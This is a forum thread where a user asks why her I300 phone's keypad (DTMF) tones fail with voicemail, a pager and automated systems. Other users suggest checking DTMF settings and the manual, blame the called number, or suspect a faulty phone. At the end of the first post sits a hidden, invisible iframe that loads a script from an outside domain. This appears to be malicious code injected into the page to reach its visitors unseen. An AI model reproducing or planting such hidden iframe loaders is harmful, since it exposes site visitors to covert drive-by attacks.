When I call from the I300, I have problems accessing my home voice mail or my pager (yes, I haven't given up my pager just yet). It seems like the tones are not recognized when I enter my password, or when I choose options.
Same problem when my husband used my phone to try to cancel golf reservations through an automated system.
Does anyone know how I can fix this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Your problem lies with the "DTMF" tones - that's the feature that allows your phone ot send the beeps to the other end. Search the PDF/ downloadable user manual for DTMF and it discusses this fairly well. If you're still having problems, let us know.
I checked my DTMF tones list, and I don't have any listed. I know that the manual has instructions on how to add them, but where do I get them to begin with?
I hear short tones when I punch the keys. When I go to the "Calls" pull-down menu and pick DTMF tones, I don't have any tones listed. The only options I have is to click Done, New or Delete All. When I pick New, the screen tells me to edit -- edit what?
well if you are hearing tones then you need not worry about any settings... do you have this problem with any other service? its possisilbe that the numbers you are callingneed linger tones to sound, but thats a long shot...
Every now and then I have the same problem. The fact that the problem doesn't occur on a reg basis leads me to believe that it may be the number you are calling.
well if you are still having these issues with the intermittent tones, and you have checked that no apps are causing you problems, then you may have a faulty phone.
